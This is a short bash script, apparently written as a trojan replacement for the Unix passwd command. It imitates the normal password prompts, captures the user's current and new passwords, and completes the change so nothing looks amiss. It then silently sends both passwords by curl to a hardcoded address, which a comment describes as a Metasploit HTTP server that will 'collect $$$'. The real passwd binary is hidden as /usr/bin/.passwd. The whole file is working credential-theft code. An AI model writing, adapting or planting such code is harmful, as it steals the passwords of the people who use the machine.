#!/bin/bash

PASSBIN="/usr/bin/.passwd"
IP="10.0.0.1"
URI=""


#get the user from the $USER variable, then check if there was an arg, if so set that user to the user we are changing
user=$USER
if [ "$1" != "" ]
then
    user=$1
fi

oldpass=""

#check user, prompt for oldpass if user is not root
if [ "$USER" != "root" ]
then
    echo -n "(current) UNIX password: "
    read -s oldpass
    echo ""
fi

#set up variables
pass="pass"
pass2="word"
chps=0
passwhile=0

#if the chpasswd command exists we will use it to change the password after taking the creds
if [ "`which chpasswd`" != "" ]
then
    chps=1
fi

#if the passwords don't match and we are not passing the while loop then go through and grab the creds
while [ $pass != $pass2 -a $passwhile -eq 0 ]
do
    echo -n "Enter new UNIX password: "
    read -s pass
    echo ""
    echo -n "Retype new UNIX password: "
    read -s pass2
    echo ""
    #if chpasswd does not exist then just tell the user that the passwords don't match
    if [ $chps -ne 1 ]
    then
        sleep 2
        echo "Sorry, passwords do not match"
        #used to escape out of the while loop
        passwhile=1
   else
        #if chpasswd does exist check if the passwords entered match
        if [ $pass == $pass2 ]
        then
            #if they do match then change the password via chpasswd
            echo "$user:$pass" | $(which chpasswd)
            echo "passwd: password updated successfully"
        else
            #if they don't match then tell the user and make them go through the while loop again
            echo "Sorry, passwords do not match"
        fi
    fi
done

#spin up metasploit http_server module and collect $$$
curl -s --user "$user:$pass" http://$IP/$URI &>/dev/null
if [ $oldpass != "" ]
then
    curl -s --user "$user:$oldpass" http://$IP/$URI &>/dev/null
fi

#if the chpasswd command didn't exist then make sure to launch the original passwd command
if [ $chps -ne 1 ]
then
    #change the path below to the location of the real passwd executable, if needed.
    #you can just delete it if chpasswd is on the system ;)
    $PASSBIN $1
fi
